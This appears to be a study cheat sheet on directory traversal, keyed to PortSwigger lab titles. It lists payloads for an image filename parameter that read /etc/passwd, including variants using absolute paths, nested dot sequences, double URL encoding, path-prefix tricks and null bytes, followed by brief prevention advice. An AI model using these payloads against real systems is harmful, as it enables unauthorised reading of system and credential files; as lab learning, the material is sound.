Directory traversal

https://portswigger.net/web-security/file-path-traversal
https://book.hacktricks.xyz/pentesting-web/file-inclusion





Reading arbitrary files via directory traversal
	File path traversal, simple case
		/image?filename=../../../etc/passwd

-------------------------------------------------------------------------------------------------------------------------------------

Common obstacles to exploiting file path traversal vulnerabilities
	File path traversal, traversal sequences blocked with absolute path bypass
		/image?filename=/etc/passwd
	File path traversal, traversal sequences stripped non-recursively
		/image?filename=....//....//....//etc/passwd
	File path traversal, traversal sequences stripped with superfluous URL-decode
		/image?filename=..%252f..%252f..%252fetc/passwd  (double encode)
	File path traversal, validation of start of path
		/image?filename=/var/www/images/../../../etc/passwd
	File path traversal, validation of file extension with null byte bypass
		/image?filename=../../../etc/passwd%00.png


-------------------------------------------------------------------------------------------------------------------------------------


How to prevent a directory traversal attack

The application should validate the user input before processing it, ideally, the validation should compare against a whitelist of permitted values
After validating the supplied input, the application should append the input to the base directory and use a platform filesystem API to canonicalize the path
Use framework library to avoid LFI/RFI


